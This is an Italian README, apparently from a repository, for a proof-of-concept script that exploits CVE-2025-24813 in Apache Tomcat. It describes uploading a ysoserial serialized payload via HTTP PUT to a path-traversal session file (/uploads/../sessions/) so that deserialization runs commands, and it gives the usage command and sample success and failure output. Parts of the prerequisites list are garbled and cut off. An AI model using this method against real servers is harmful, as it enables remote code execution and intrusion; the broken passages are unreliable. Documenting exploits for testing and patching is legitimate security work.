
Questo repository contiene uno script automatizzato di Proof of Concept (PoC) per sfruttare **CVE-2025-24813**, una vulnerabilità di Esecuzione Remota di Codice (RCE) in Apache Tomcat. La vulnerabilità consente a un utente malintenzionato di caricare un payload serializzato dannoso sul server, portando all'esecuzione arbitraria di codice tramite deserializzazione quando vengono soddisfatte specifiche condizioni.
CVE-2025-24813 è una vulnerabilità RCE teorica in Apache Tomcat che sfrutta la gestione impropria dei file di sessione caricati e dei meccanismi di deserializzazione. Caricando un payload appositamente creato in una directory scrivibile (es. /uploads/../sessions/), un attaccante può attivare la deserializzazione, con conseguente esecuzione di comandi arbitrari sul server target.
Affinché questo PoC possa sfruttare con successo la vulnerabilità, devono essere soddisfatte le seguenti condizioni:
/index.jsp) e attivare la deserializzazione del payload.ysoserial o compilare payload basati su Java.ysoserial, il file ysoserial.jar deve essere disponibile localmente.python CVE-2025-24813.py <target_url> [options]
[+] Server is writable via PUT: http://localhost:8081/check.txt
[*] Session ID: absholi7ly
[+] Payload generated successfully: payload.ser
[+] Payload uploaded with status 409 (Conflict): http://localhost:8081/uploads/../sessions/absholi7ly.session
[+] Exploit succeeded! Server returned 500 after deserialization.
[+] Target http://localhost:8081 is vulnerable to CVE-2025-24813!
[+] Temporary file removed: payload.ser
[+] Server is writable via PUT: http://localhost:8081/check.txt
[*] Session ID: absholi7ly
[+] Payload generated successfully: payload.ser
[-] Payload upload failed: http://localhost:8081/uploads/../sessions/absholi7ly.session (HTTP 403)
[-] Target http://localhost:8081 does not appear vulnerable or exploit failed.
[+] Temporary file removed: payload.ser